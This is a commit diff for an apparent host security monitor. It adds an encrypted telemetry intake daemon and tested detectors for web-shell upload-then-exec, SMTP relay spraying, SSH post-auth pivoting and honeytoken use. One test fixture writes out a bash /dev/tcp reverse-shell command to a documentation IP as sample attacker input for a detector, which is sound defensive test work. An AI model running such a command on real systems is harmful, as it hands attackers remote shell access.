Add mux telemetry intake
ober
ac26955565976a0460902c34bfd6919a63f3c7aa
--- a/Makefile +++ b/Makefile @@ -14,7 +14,7 @@ SCHEME ?= $(JERBOA)/.chez/bin/scheme BUILD ?= build/rust TYPED := $(wildcard typed/*.ss) -.PHONY: vendor-deps ensure-jerboa ensure-jsqlite rust test ffi-demo kernels-check triage-check triage-store-check analytics-check detect-check storage-check entity-check threats-check geoip-check sigma-check yaml-rules-check buffer-check dns-sniffer-check suspicious-check netconn-check kernmod-check selinux-check container-check dns-servers-check sensitive-path-check dtrace-parse-check dtrace-runtime-check stealth-check ebpf-events-check ebpf-runtime-check proc-linux-check freebsd-parse-check event-meta-check config-check privdrop-check event-danger-check persistence-check file-change-check webshell-check platform-mounts-check analyze-cli-check collector-cli-check event-summary-check ioc-check frame-check correlate-check revshell-check cron-check logtamper-check detection-rules-check ipaddr-check auth-check lolbin-check dga-check calendar-check monitor-process-check monitor-network-check monitor-files-check monitor-auth-check monitor-kernel-check monitor-cron-check monitor-container-check monitor-rootkit-check monitor-podman-check monitor-selinux-check monitor-lateral-check monitor-webshell-check monitor-revshell-check monitor-persistence-check monitor-logtamper-check monitor-dns-check monitor-manager-check event-json-check collector-check protocol-check event-codec-check local-store-check collector-pull-check agent-server-check checks native-runtime keygen analyze collector agent binaries clean +.PHONY: vendor-deps ensure-jerboa ensure-jsqlite rust test ffi-demo kernels-check triage-check triage-store-check analytics-check detect-check storage-check entity-check threats-check geoip-check sigma-check yaml-rules-check buffer-check dns-sniffer-check suspicious-check netconn-check kernmod-check selinux-check container-check dns-servers-check sensitive-path-check dtrace-parse-check dtrace-runtime-check stealth-check ebpf-events-check ebpf-runtime-check proc-linux-check freebsd-parse-check event-meta-check config-check privdrop-check event-danger-check persistence-check file-change-check webshell-check platform-mounts-check analyze-cli-check collector-cli-check event-summary-check ioc-check frame-check correlate-check revshell-check cron-check logtamper-check detection-rules-check daemon-telemetry-check mux-telemetry-check ipaddr-check auth-check lolbin-check dga-check calendar-check monitor-process-check monitor-network-check monitor-files-check monitor-auth-check monitor-kernel-check monitor-cron-check monitor-container-check monitor-rootkit-check monitor-podman-check monitor-selinux-check monitor-lateral-check monitor-webshell-check monitor-revshell-check monitor-persistence-check monitor-logtamper-check monitor-dns-check monitor-manager-check event-json-check collector-check protocol-check event-codec-check local-store-check collector-pull-check agent-server-check checks native-runtime keygen analyze collector agent telemetry binaries clean # Combined libdir path so sibling libraries `(jsecmon ...)` resolve to ./jsecmon # (a second --libdirs would replace, not append, the jerboa one). LIBDIRS := "$(CURDIR):$(JSQLITE_SRC):$(JERBOA)/lib" @@ -396,6 +396,17 @@ logtamper-check: detection-rules-check: $(SCHEME) --libdirs $(LIBDIRS) --script examples/detection_rules_check.ss +# First-party daemon telemetry normalization and early exploit detectors for +# httpd/smtpd/sshd replacements. Pure row-hash logic; no dylib. +daemon-telemetry-check: + $(SCHEME) --libdirs $(LIBDIRS) --script examples/daemon_telemetry_check.ss + +# Obersh-compatible mux telemetry intake: mux framing, PSK encrypted envelope, +# SQLite persistence/replay dedup, and daemon-detector integration. +mux-telemetry-check: rust ensure-jsqlite + cd $(BUILD) && cargo build --release + $(LOADER_ENV) $(SCHEME) --libdirs $(LIBDIRS) --script examples/mux_telemetry_check.ss + # IP-address parsing + internal-network test (secmon src/monitor/lateral.rs): # parse-ipv4 / parse-ipv6 faithfully reproduce Rust std's IpAddr FromStr (no # leading zeros, <=255, "::" compression, embedded IPv4), then is_internal_ip @@ -584,6 +595,8 @@ checks: kernels-check ensure-jsqlite $(SCHEME) --libdirs $(LIBDIRS) --script examples/cron_check.ss $(SCHEME) --libdirs $(LIBDIRS) --script examples/logtamper_check.ss $(SCHEME) --libdirs $(LIBDIRS) --script examples/detection_rules_check.ss + $(SCHEME) --libdirs $(LIBDIRS) --script examples/daemon_telemetry_check.ss + $(LOADER_ENV) $(SCHEME) --libdirs $(LIBDIRS) --script examples/mux_telemetry_check.ss $(SCHEME) --libdirs $(LIBDIRS) --script examples/ipaddr_check.ss $(SCHEME) --libdirs $(LIBDIRS) --script examples/auth_check.ss $(SCHEME) --libdirs $(LIBDIRS) --script examples/lolbin_check.ss @@ -647,6 +660,10 @@ agent: rust native-runtime ensure-jsqlite cd $(BUILD) && cargo build --release JERBOA_HOME="$(JERBOA)" $(SCHEME) --libdirs $(LIBDIRS) --script build-binary.ss bin/agent.ss jsecmon-agent +telemetry: rust native-runtime ensure-jsqlite + cd $(BUILD) && cargo build --release + JERBOA_HOME="$(JERBOA)" $(SCHEME) --libdirs $(LIBDIRS) --script build-binary.ss bin/telemetry.ss jsecmon-telemetry + # ── Experimental: Typed Jerboa → LLVM IR native backend ────────────────────── # # The six PURE kernels (no crypto, no Rust) compile straight to textual LLVM IR @@ -693,8 +710,8 @@ llvmir-clean: rm -rf $(LLVMIR_DIR) # All shippable binaries. -binaries: keygen analyze collector agent +binaries: keygen analyze collector agent telemetry clean: rm -rf $(BUILD) $(LLVMIR_DIR) - rm -f jsecmon-keygen jsecmon-analyze jsecmon-collector jsecmon-agent + rm -f jsecmon-keygen jsecmon-analyze jsecmon-collector jsecmon-agent jsecmon-telemetry --- a/README.md +++ b/README.md @@ -64,6 +64,8 @@ make revshell-check # revshell: is_shell/is_c2_port/is_legitimate + classify_co make cron-check # cron: per-platform CRON/PERIODIC path tables + systemd/periodic route make logtamper-check # logtamper: system-log/history tables + classify-tamper (trunc/mtime) make detection-rules-check # DETECTION_RULES ATT&CK catalog: rule_attack + anomaly_rule_attack +make daemon-telemetry-check # daemon telemetry normalization + httpd/smtpd/sshd early exploit rules +make mux-telemetry-check # obersh-compatible mux telemetry intake + encrypted storage path make ipaddr-check # lateral: faithful IpAddr parse (v4/v6) + is_internal_ip (RFC1918/fc00) make auth-check # auth-log parsers: sshd/sudo/su/pam/useradd/userdel/passwd + extract_field make monitor-process-check # process monitor scan loop: pid diff/classify/emit over fixture provider @@ -121,8 +123,9 @@ does `(load-shared-object #f)` in this mode. The result is one Mach-O/ELF file that needs no scheme, no `.ss`, and no kernel `.dylib` at runtime. `make keygen` builds `jsecmon-keygen` (the ECIES keypair + PSK generator, port of -`secmon-keygen`); `make binaries` builds all of them. The `make *-check` vector -tests stay as dev-time `.ss` scripts (the test harness, not shipped). +`secmon-keygen`); `make telemetry` builds the mux daemon-telemetry intake; +`make binaries` builds all of them. The `make *-check` vector tests stay as +dev-time `.ss` scripts (the test harness, not shipped). | secmon binary | jsecmon | status | |------------------|--------------------|---------------------------------| @@ -130,6 +133,7 @@ tests stay as dev-time `.ss` scripts (the test harness, not shipped). | `bin/analyze` | `bin/analyze.ss` → `make analyze` | ✅ **compiled binary** — assembles `run_detections` itself over `(jsecmon storage)`; summary/query/anomalies/first-seen/timeline/retention all wired to the ported detection + analytics layers. | | `bin/collector` | `bin/collector.ss` → `make collector` | ✅ **compiled binary** — the agent **pull** client: PSK handshake (Challenge → ChallengeResponse) over the transport envelope, then `get_events_after`/`status` requests; each `SerializedEvent` is ECIES-decrypted to a `SecurityEvent` and printed (`--format human`/`json`, secmon-faithful) or persisted to SQLite (`--db`, advancing `collector_state`). `poll`/`status`/`watch` subcommands. Verified end-to-end over a real TCP socket (`examples/fake_agent.ss` loopback) and byte-wise without a socket (`make collector-pull-check`). Loads keys from env/file at runtime, never embedded. | | `bin/agent` | `bin/agent.ss` → `make agent` | ✅ **compiled binary** — runtime shell: loads the collector public key + PSK from env/file, opens the local encrypted event store when configured, starts the PSK-authenticated pull server, ECIES-encrypts `SecurityEvent` bytes into the priority buffer, persists plaintext events locally, emits `agent_start`/`heartbeat`, initializes stealth before key/config work, and drops to `nobody` after privileged resources are open. On Linux it prefers the eBPF stream and falls back to the provider-backed polling set (`process`, `network`, `files`, `auth`, `kernel`, `scheduled`, `container`, `rootkit`, `podman`, `selinux`, `persistence`, `lateral`, `logtamper`, `webshell`, `revshell`, `dns`). On FreeBSD it wires the DTrace direct/subprocess stream before privilege drop. Verified with `jsecmon-collector status`/`poll` against the compiled agent on a real loopback TCP socket; `agent-server-check` also pins the local-store status fields. | +| daemon telemetry | `bin/telemetry.ss` → `make telemetry` | ✅ **compiled binary** — dedicated mux intake for `jerboa-smtp`/`jerboa-sshd`/httpd-style first-party daemons. Listens on `SECMON_TELEMETRY_LISTEN` (default `0.0.0.0:31338`), opens mux `MSG-ENCRYPTED` frames with the PSK transport key, requires `source` + monotonic `seq`, stores `daemon_telemetry` rows, and replies with encrypted ACK/ERROR frames. Verified over loopback by `make mux-telemetry-check`. | ## Port status new file mode 100644 --- /dev/null +++ b/bin/telemetry.ss @@ -0,0 +1,136 @@ +#!chezscheme +;;; jsecmon-telemetry -- mux telemetry intake for first-party daemons. +;;; +;;; Accepts obersh-compatible mux frames carrying secmon PSK-encrypted daemon +;;; telemetry, stores accepted rows in the jsecmon events database, and returns +;;; encrypted ACK/ERROR mux frames. + +(import (except (chezscheme) + make-hash-table hash-table? + sort sort! + printf fprintf + path-extension path-absolute? + with-input-from-string with-output-to-string + iota 1+ 1- + partition + make-date make-time) + (except (jerboa prelude) meta atom?) + (only (jsecmon config) local-db-path) + (only (jsecmon kernels) hex-decode derive-transport-key) + (only (jsecmon storage) store-open) + (only (jsecmon mux-telemetry-server) + make-mux-telemetry-runtime + mux-telemetry-server-start! + mux-telemetry-server-port)) + +(def *default-listen* "0.0.0.0:31338") + +(def (println . parts) (for-each display parts) (newline)) +(def (eprintln . parts) + (let ((p (current-error-port))) + (for-each (lambda (x) (display x p)) parts) + (newline p))) +(def (die . parts) (apply eprintln parts) (exit 1)) + +(def (usage) + (eprintln "jsecmon-telemetry - Receive encrypted mux daemon telemetry\n") + (eprintln "Usage:") + (eprintln " jsecmon-telemetry [--listen host:port] [--db path]\n") + (eprintln "Environment variables:") + (eprintln " SECMON_PSK Pre-shared key (hex) or path to key file") + (eprintln " PSK Alias accepted from keygen output") + (eprintln " SECMON_PSK_FILE Path to PSK hex file") + (eprintln " SECMON_TELEMETRY_LISTEN Listen address, default " *default-listen*) + (eprintln " SECMON_DB_PATH Events DB path")) + +(def (arg? flag argv) (and (member flag argv) #t)) + +(def (flag-value argv flag) + (let loop ((xs argv)) + (cond ((or (null? xs) (null? (cdr xs))) #f) + ((string=? (car xs) flag) (cadr xs)) + (else (loop (cdr xs)))))) + +(def (read-file-trimmed path) + (string-trim (call-with-input-file path get-string-all))) + +(def (lookup-env names) + (let loop ((ns names)) + (cond ((null? ns) #f) + ((getenv (car ns)) => (lambda (v) v)) + (#t (loop (cdr ns)))))) + +(def (path-like-key? v) + (and (< (string-length v) 128) + (or (string-prefix? "/" v) + (string-prefix? "." v) + (file-exists? v)))) + +(def (resolve-key-value v) + (if (path-like-key? v) + (try (read-file-trimmed v) + (catch (e) (die "failed to read key file " v ": " e))) + v)) + +(def (load-psk-hex) + (cond + ((lookup-env '("SECMON_PSK" "PSK")) => resolve-key-value) + ((lookup-env '("SECMON_PSK_FILE" "PSK_FILE")) + => (lambda (p) + (try (read-file-trimmed p) + (catch (e) (die "failed to read PSK file " p ": " e))))) + (else (die "PSK not set (export SECMON_PSK/PSK or SECMON_PSK_FILE)")))) + +(def (decode-32 label hex) + (try + (let ((b (hex-decode hex))) + (unless (= (bytevector-length b) 32) + (die label " must decode to exactly 32 bytes")) + b) + (catch (e) (die "invalid " label ": " e)))) + +(def (last-colon s) + (let loop ((i (- (string-length s) 1))) + (cond ((< i 0) #f) + ((char=? (string-ref s i) #\:) i) + (#t (loop (- i 1)))))) + +(def (split-host-port hp) + (let ((i (last-colon hp))) + (if i + (values (substring hp 0 i) + (or (string->number (substring hp (+ i 1) (string-length hp))) 31338)) + (values hp 31338)))) + +(def (runtime-platform) + (cond ((file-exists? "/dev/dtrace/dtrace") 'freebsd) + ((file-exists? "/proc/version") 'linux) + (else 'other))) + +(def (forever) + (let loop () + (sleep-ms 3600000) + (loop))) + +(def (main) + (let ((argv (command-line-arguments))) + (when (or (arg? "--help" argv) (arg? "-h" argv)) + (usage) + (exit 0)) + (let* ((listen (or (flag-value argv "--listen") + (getenv "SECMON_TELEMETRY_LISTEN") + *default-listen*)) + (db-path (or (flag-value argv "--db") + (local-db-path getenv (runtime-platform)))) + (psk (decode-32 "PSK" (load-psk-hex))) + (tk (derive-transport-key psk)) + (db (store-open db-path))) + (let-values (((host port) (split-host-port listen))) + (let* ((rt (make-mux-telemetry-runtime db tk)) + (srv (mux-telemetry-server-start! rt host port))) + (eprintln "[info] jsecmon-telemetry listening on " + host ":" (mux-telemetry-server-port srv) + " db=" db-path) + (forever)))))) + +(main) new file mode 100644 --- /dev/null +++ b/examples/daemon_telemetry_check.ss @@ -0,0 +1,199 @@ +;;; Daemon-telemetry detector check. +;;; +;;; Verifies the pure telemetry intake and early exploit detectors intended for +;;; first-party httpd/smtpd/sshd replacements. +;;; +;;; scheme --libdirs "$JERBOA/lib:." --script examples/daemon_telemetry_check.ss + +(import (jerboa prelude) + (jsecmon daemon-telemetry)) + +(def fails 0) +(def (check label got want) + (let ((ok (equal? got want))) + (unless ok (set! fails (+ fails 1))) + (displayln (if ok " ok " " FAIL ") label " => " got + (if ok "" (str " (want " want ")"))))) +(def (check-pred label got pred) + (let ((ok (pred got))) + (unless ok (set! fails (+ fails 1))) + (displayln (if ok " ok " " FAIL ") label " => " got))) + +(def (fields . kvs) + (let ((h (make-hash-table))) + (let loop ((xs kvs)) + (unless (or (null? xs) (null? (cdr xs))) + (hash-put! h (car xs) (cadr xs)) + (loop (cddr xs)))) + h)) + +(def (dt host ts daemon action . kvs) + (make-daemon-telemetry host ts daemon action "info" (apply fields kvs))) + +(def (detail a k) (hash-get (hash-get a "details") k)) +(def (rule? name) (lambda (a) (string=? (hash-get a "rule") name))) + +(displayln "normalization:") +(let* ((raw '(("host" . "h1") + ("ts" . 1234) + ("daemon" . "jhttpd") + ("signal" . "bad_request") + ("remote_ip" . "203.0.113.10") + ("reason" . "malformed header"))) + (ev (normalize-daemon-telemetry raw))) + (check "raw alist -> daemon_telemetry" + (hash-get ev "event_type") "daemon_telemetry") + (check "raw alist keeps daemon" (hash-get (hash-get ev "data") "daemon") "jhttpd") + (check "daemon-telemetry? true" (daemon-telemetry? ev) #t)) +(let ((ordinary (fields "event_type" "process_start" + "host" "h1" + "timestamp_ms" 1 + "process_name" "bash"))) + (check "ordinary event rows are ignored" + (normalize-daemon-telemetry ordinary) #f)) + +(displayln "protocol abuse:") +(let ((events '())) + (dotimes (i 5) + (set! events + (cons (dt "h1" (+ 60000 (* i 1000)) "jhttpd" "bad_request" + "remote_ip" "203.0.113.10" + "reason" "malformed request line") + events))) + (let ((r (detect-protocol-abuse events))) + (check "5 protocol errors in 60s fires" (length r) 1) + (check " rule" (hash-get (car r) "rule") "daemon_protocol_abuse") + (check " count" (detail (car r) "error_count") 5) + (check " attack mapping" (hash-get (car r) "attack") '("T1190")))) +(let ((events '())) + (dotimes (i 4) + (set! events + (cons (dt "h1" (+ 60000 (* i 1000)) "jhttpd" "bad_request" + "remote_ip" "203.0.113.10") + events))) + (check "4 protocol errors below threshold" (length (detect-protocol-abuse events)) 0)) + +(displayln "http upload -> exec:") +(let* ((upload (dt "web1" 1000 "jhttpd" "upload" + "remote_ip" "198.51.100.2" + "session_id" "s1" + "path" "/var/www/html/uploads/shell.php")) + (exec (dt "web1" 70000 "jhttpd" "exec" + "remote_ip" "198.51.100.2" + "session_id" "s1" + "path" "/var/www/html/uploads/shell.php" + "command" "bash -i >& /dev/tcp/198.51.100.2/4444 0>&1")) + (noise (dt "web1" 71000 "jhttpd" "exec" + "remote_ip" "198.51.100.9" + "session_id" "other" + "path" "/var/www/html/uploads/shell.php" + "command" "id")) + (r (detect-http-upload-exec (list noise exec upload)))) + (check "same actor sequence fires once" (length r) 1) + (check " severity" (hash-get (car r) "severity") "critical") + (check " path" (detail (car r) "path") "/var/www/html/uploads/shell.php") + (check " gap seconds" (detail (car r) "gap_seconds") 69)) +(let ((r (detect-http-upload-exec + (list (dt "web1" 1000 "jhttpd" "upload" + "remote_ip" "198.51.100.2" + "session_id" "s1" + "path" "/var/www/html/uploads/shell.php") + (dt "web1" 70000 "jhttpd" "exec" + "remote_ip" "198.51.100.2" + "session_id" "s2" + "path" "/var/www/html/uploads/shell.php" + "command" "id"))))) + (check "different sessions do not correlate" (length r) 0)) + +(displayln "smtp relay spray:") +(let ((events '())) + (dotimes (i 10) + (set! events + (cons (dt "mx1" (+ 600000 (* i 1000)) "jsmtpd" "rcpt_denied" + "remote_ip" "203.0.113.55" + "recipient" (str "user" i "@example.com") + "reason" "relay denied") + events))) + (let ((r (detect-smtp-relay-spray events))) + (check "10 denied rcpts fires" (length r) 1) + (check " distinct recipients" (detail (car r) "distinct_recipients") 10))) + +(displayln "ssh post-auth pivot:") +(let* ((auth (dt "ssh1" 1000 "jsshd" "auth" + "remote_ip" "198.51.100.8" + "session_id" "ssh-a" + "user" "deploy" + "success" #t)) + (fwd (dt "ssh1" 60000 "jsshd" "port_forward" + "remote_ip" "198.51.100.8" + "session_id" "ssh-a" + "user" "deploy" + "target" "10.0.0.5:5432")) + (r (detect-ssh-postauth-pivot (list fwd auth)))) + (check "auth then port forward fires" (length r) 1) + (check " rule" (hash-get (car r) "rule") "daemon_ssh_postauth_pivot") + (check " user" (detail (car r) "user") "deploy") + (check-pred " reason mentions forwarding" + (detail (car r) "reason") + (lambda (s) (and (string-contains s "forwarding") #t)))) +(let* ((auth (dt "ssh1" 1000 "jsshd" "auth" + "remote_ip" "198.51.100.8" + "session_id" "ssh-a" + "user" "deploy" + "success" #t)) + (late (dt "ssh1" 700000 "jsshd" "port_forward" + "remote_ip" "198.51.100.8" + "session_id" "ssh-a" + "user" "deploy" + "target" "10.0.0.5:5432"))) + (check "outside 5 min window does not fire" + (length (detect-ssh-postauth-pivot (list late auth))) 0)) +(let* ((auth (dt "ssh1" 1000 "jsshd" "auth" + "remote_ip" "198.51.100.8" + "session_id" "ssh-b" + "user" "www" + "success" #t)) + (write (dt "ssh1" 3000 "jsshd" "sftp_write" + "remote_ip" "198.51.100.8" + "session_id" "ssh-b" + "user" "www" + "path" "/home/www/.ssh/authorized_keys")) + (r (detect-ssh-postauth-pivot (list write auth)))) + (check "authorized_keys write fires" (length r) 1) + (check-pred " reason mentions sensitive path" + (detail (car r) "reason") + (lambda (s) (and (string-contains s "sensitive path") #t)))) + +(displayln "canary use:") +(let ((r (detect-canary-use + (list (dt "h1" 2000 "jsshd" "auth" + "remote_ip" "203.0.113.99" + "user" "backup" + "credential_class" "honeytoken" + "token_id" "ssh-canary-1"))))) + (check "honeytoken credential fires" (length r) 1) + (check " token id" (detail (car r) "token_id") "ssh-canary-1") + (check " severity" (hash-get (car r) "severity") "critical")) + +(displayln "combined runner:") +(let* ((events + (list + (dt "h1" 1000 "jsshd" "auth" + "remote_ip" "10.0.0.9" "session_id" "a" "user" "root" + "success" #t "canary" #t) + (dt "h1" 2000 "jsshd" "agent_forward" + "remote_ip" "10.0.0.9" "session_id" "a" "user" "root" + "target" "agent"))) + (r (run-daemon-detections events))) + (check "canary + ssh pivot both fire" (length r) 2) + (check-pred " has canary" + (find (rule? "daemon_canary_use") r) + (lambda (x) (not (not x)))) + (check-pred " has ssh pivot" + (find (rule? "daemon_ssh_postauth_pivot") r) + (lambda (x) (not (not x))))) + +(newline) +(if (= fails 0) + (displayln "OK: daemon telemetry normalization and early detectors pass.") + (begin (displayln fails " FAILURES") (exit 1))) new file mode 100644 --- /dev/null +++ b/examples/mux_telemetry_check.ss @@ -0,0 +1,167 @@ +;;; Mux telemetry intake check. +;;; +;;; Verifies the obersh-compatible mux frame shape, secmon PSK encrypted +;;; telemetry envelope, SQLite persistence, replay dedup, and detector +;;; integration for first-party daemon telemetry. +;;; +;;; Run from the repo root with the dylib built and repo/jsqlite on libdirs: +;;; (cd build/rust && cargo build --release) +;;; scheme --libdirs "$PWD:vendor/jsqlite/src:vendor/jerboa/lib" --script examples/mux_telemetry_check.ss + +(import (jerboa prelude) + (jsecmon kernels) + (jsecmon mux-telemetry) + (jsecmon mux-telemetry-server) + (jsecmon storage) + (jsecmon daemon-telemetry) + (only (std net tcp) tcp-connect-binary)) + +(def fails 0) +(def (check label got want) + (let ((ok (equal? got want))) + (unless ok (set! fails (+ fails 1))) + (displayln (if ok " ok " " FAIL ") label " => " got + (if ok "" (str " (want " want ")"))))) +(def (check-pred label got pred) + (let ((ok (pred got))) + (unless ok (set! fails (+ fails 1))) + (displayln (if ok " ok " " FAIL ") label " => " got))) + +(def (u8s bv) + (let loop ((i 0) (acc '())) + (if (= i (bytevector-length bv)) + (reverse acc) + (loop (+ i 1) (cons (bytevector-u8-ref bv i) acc))))) + +(def (read-exact in n) + (let ((buf (make-bytevector n 0))) + (let loop ((off 0)) + (if (>= off n) + buf + (let ((chunk (get-bytevector-n in (- n off)))) + (when (or (eof-object? chunk) (not (bytevector? chunk))) + (error 'read-exact "connection closed")) + (let ((k (bytevector-length chunk))) + (when (= k 0) (error 'read-exact "connection closed")) + (bytevector-copy! chunk 0 buf off k) + (loop (+ off k)))))))) + +(def (mux-len header) + (bitwise-ior + (bitwise-arithmetic-shift-left (bytevector-u8-ref header 1) 24) + (bitwise-arithmetic-shift-left (bytevector-u8-ref header 2) 16) + (bitwise-arithmetic-shift-left (bytevector-u8-ref header 3) 8) + (bytevector-u8-ref header 4))) + +(def (read-mux-frame in) + (let* ((header (read-exact in 5)) + (len (mux-len header)) + (frame (make-bytevector (+ 5 len) 0))) + (bytevector-copy! header 0 frame 0 5) + (when (> len 0) + (bytevector-copy! (read-exact in len) 0 frame 5 len)) + frame)) + +(def (telemetry seq source host ts daemon action . kvs) + (let ((h (make-hash-table))) + (hash-put! h "seq" seq) + (hash-put! h "source" source) + (hash-put! h "host" host) + (hash-put! h "timestamp_ms" ts) + (hash-put! h "daemon" daemon) + (hash-put! h "action" action) + (hash-put! h "severity" "info") + (let loop ((xs kvs)) + (unless (or (null? xs) (null? (cdr xs))) + (hash-put! h (car xs) (cadr xs)) + (loop (cddr xs)))) + h)) + +(def psk (make-bytevector 32 66)) +(def tk (derive-transport-key psk)) +(def wrong-tk (derive-transport-key (make-bytevector 32 67))) + +(displayln "mux framing:") +(def plain-frame (mux-frame-encode MUX-MSG-TELEMETRY (string->utf8 "abc"))) +(check "golden [type,len,payload]" (u8s plain-frame) '(80 0 0 0 3 97 98 99)) +(let ((d (mux-frame-decode plain-frame))) + (check "decode ok" (ok? d) #t) + (check " type" (car (unwrap d)) MUX-MSG-TELEMETRY) + (check " payload" (utf8->string (cdr (unwrap d))) "abc")) +(check "truncated frame is err" (err? (mux-frame-decode (make-bytevector 4 0))) #t) +(check "trailing bytes are err" + (err? (mux-frame-decode (u8-list->bytevector '(80 0 0 0 1 65 66)))) #t) + +(displayln "encrypted telemetry envelope:") +(def raw + (telemetry 1 "jsmtp@mx1" "mx1" 1000 "jsmtpd" "rcpt_denied" + "remote_ip" "203.0.113.55" + "recipient" "alice@example.com" + "reason" "relay denied")) +(def sealed (unwrap (mux-telemetry-seal tk raw))) +(check "outer type is MSG-ENCRYPTED" (bytevector-u8-ref sealed 0) MUX-MSG-ENCRYPTED) +(let ((opened (mux-telemetry-open tk sealed))) + (check "open ok" (ok? opened) #t) + (check " event_type" (hash-get (unwrap opened) "event_type") "daemon_telemetry") + (check " daemon" (hash-get (hash-get (unwrap opened) "data") "daemon") "jsmtpd") + (check " action" (hash-get (hash-get (unwrap opened) "data") "action") "rcpt_denied")) +(check "wrong key rejects" (err? (mux-telemetry-open wrong-tk sealed)) #t) + +(displayln "storage intake:") +(def db (store-open ":memory:")) +(check "store encrypted frame" (unwrap (store-mux-telemetry-frame! db tk sealed)) #t) +(check "replay duplicate ignored" (unwrap (store-mux-telemetry-frame! db tk sealed)) #f) +(check "row count" (store-count db) 1) +(let* ((rows (query-events db (make-filter "event_type" "daemon_telemetry"))) + (row (car rows)) + (data (hash-get row "data"))) + (check "stored type" (hash-get row "event_type") "daemon_telemetry") + (check "stored source" (hash-get row "source") "jsmtp@mx1") + (check "stored data daemon" (hash-get data "daemon") "jsmtpd") + (check-pred "stored summary mentions remote" + (hash-get row "summary") + (lambda (s) (and (string-contains s "203.0.113.55") #t)))) + +(displayln "stored telemetry -> daemon detectors:") +(dotimes (i 10) + (let* ((ev (telemetry (+ 100 i) "spray@mx1" "mx1" (+ 600000 (* i 1000)) + "jsmtpd" "rcpt_denied" + "remote_ip" "203.0.113.77" + "recipient" (str "user" i "@example.com") + "reason" "relay denied")) + (frame (unwrap (mux-telemetry-seal tk ev)))) + (check (str " store spray " i) + (unwrap (store-mux-telemetry-frame! db tk frame)) #t))) +(let* ((events (query-events db (make-filter "event_type" "daemon_telemetry" + "limit" 100))) + (alerts (detect-smtp-relay-spray events))) + (check "smtp relay spray fires from stored rows" (length alerts) 1) + (check " rule" (hash-get (car alerts) "rule") "daemon_smtp_relay_spray") + (check " distinct recipients" + (hash-get (hash-get (car alerts) "details") "distinct_recipients") 10)) + +(displayln "tcp listener:") +(def rt (make-mux-telemetry-runtime db tk)) +(def srv (mux-telemetry-server-start! rt "127.0.0.1" 0)) +(let-values (((in out) (tcp-connect-binary "127.0.0.1" (mux-telemetry-server-port srv)))) + (let ((ev (telemetry 1 "tcp@mx1" "mx1" 900000 "jsmtpd" "protocol_error" + "remote_ip" "198.51.100.9" + "reason" "malformed command"))) + (put-bytevector out (unwrap (mux-telemetry-seal tk ev))) + (flush-output-port out) + (let* ((reply (mux-encrypted-json-open tk (read-mux-frame in))) + (type (car (unwrap reply))) + (payload (cdr (unwrap reply)))) + (check "server reply decrypts" (ok? reply) #t) + (check "server ACK type" type MUX-MSG-TELEMETRY-ACK) + (check "server inserted" (hash-get payload "inserted") #t))) + (close-port in) + (close-port out)) +(mux-telemetry-server-stop! srv) +(check "tcp listener stored row" (store-count db) 12) + +(store-close db) +(newline) +(if (= fails 0) + (displayln "OK: mux telemetry frames decrypt, persist, dedup, and drive daemon detections.") + (begin (displayln fails " FAILURES") (exit 1))) new file mode 100644 --- /dev/null +++ b/jsecmon/daemon-telemetry.ss @@ -0,0 +1,417 @@ +#!chezscheme +;;; jsecmon daemon telemetry, untyped. +;;; +;;; This module is the intake contract for first-party replacement daemons +;;; (httpd/smtpd/sshd-style services) that can report protocol-level events +;;; before the OS-level monitors see a child process, file change, or connection. +;;; +;;; The contract deliberately matches the row-hash shape used by storage, +;;; detect, threats, and analytics: +;;; event_type = "daemon_telemetry" +;;; host = monitored host +;;; timestamp_ms = epoch milliseconds +;;; severity = info|medium|high|critical +;;; process_name = daemon name +;;; data = hash with "daemon", "action", and daemon-specific fields +;;; +;;; Detectors stay pure over a batch of those row hashes. They produce anomaly +;;; hashes in the same shape as (jsecmon detect)/(jsecmon threats). + +(library (jsecmon daemon-telemetry) + (export make-daemon-telemetry normalize-daemon-telemetry daemon-telemetry? + run-daemon-detections + detect-protocol-abuse detect-http-upload-exec + detect-smtp-relay-spray detect-ssh-postauth-pivot detect-canary-use + daemon-rule-attack) + (import (except (chezscheme) + make-hash-table hash-table? + sort sort! + printf fprintf + path-extension path-absolute? + with-input-from-string with-output-to-string + iota 1+ 1- + partition + make-date make-time) + (except (jerboa prelude) meta atom?)) + + (def protocol-window-ms 60000) + (def smtp-window-ms 600000) + (def http-sequence-window-ms 600000) + (def ssh-sequence-window-ms 300000) + + ;; ── generic row/hash helpers ─────────────────────────────────────────────── + (def (raw-ref raw key) + (cond ((hash-table? raw) (hash-get raw key)) + ((list? raw) (let ((p (assoc key raw))) (and p (cdr p)))) + (else #f))) + + (def (copy-fields! dst fields) + (cond + ((hash-table? fields) + (for-each (lambda (k) (hash-put! dst k (hash-get fields k))) + (hash-keys fields))) + ((list? fields) + (for-each (lambda (kv) + (when (pair? kv) (hash-put! dst (car kv) (cdr kv)))) + fields)))) + + (def (str-val v) + (cond ((string? v) v) + ((symbol? v) (symbol->string v)) + ((number? v) (number->string v)) + (else ""))) + (def (lower v) (string-downcase (str-val v))) + (def (num-val v d) (if (number? v) v d)) + + (def (truthy? v) + (cond ((eq? v #t) #t) + ((number? v) (not (= v 0))) + ((string? v) + (let ((s (string-downcase v))) + (if (member s '("1" "true" "yes" "y" "canary" "honeytoken")) #t #f))) + (else #f))) + + (def (nonempty? s) (and (string? s) (not (string=? s "")))) + (def (has? s sub) (and (string-contains s sub) #t)) + (def (has-any? s needles) + (and (any (lambda (n) (string-contains s n)) needles) #t)) + (def (member-string? s xs) + (if (member s xs) #t #f)) + (def (key->string parts) + (string-join (map (lambda (x) (str x)) parts) "\x1f;")) + + (def (details-hash . kvs) + (let ((h (make-hash-table))) + (let loop ((xs kvs)) + (if (or (null? xs) (null? (cdr xs))) + h + (begin (hash-put! h (car xs) (cadr xs)) (loop (cddr xs))))))) + + (def (make-anomaly rule host sev ts details) + (let ((h (make-hash-table))) + (hash-put! h "rule" rule) + (hash-put! h "host" host) + (hash-put! h "severity" sev) + (hash-put! h "timestamp_ms" ts) + (hash-put! h "details" details) + (hash-put! h "attack" (daemon-rule-attack rule)) + h)) + + ;; ── event construction and normalization ────────────────────────────────── + (def (make-daemon-telemetry host ts daemon action severity fields) + (let ((ev (make-hash-table)) + (data (make-hash-table))) + (copy-fields! data fields) + (hash-put! data "daemon" daemon) + (hash-put! data "action" action) + (hash-put! ev "event_type" "daemon_telemetry") + (hash-put! ev "host" host) + (hash-put! ev "timestamp_ms" ts) + (hash-put! ev "severity" severity) + (hash-put! ev "process_name" daemon) + (hash-put! ev "data" data) + ev)) + + (def (daemon-telemetry? ev) + (and (hash-table? ev) + (let ((ty (hash-get ev "event_type"))) + (and (string? ty) (string=? ty "daemon_telemetry"))))) + + (def (normalize-daemon-telemetry 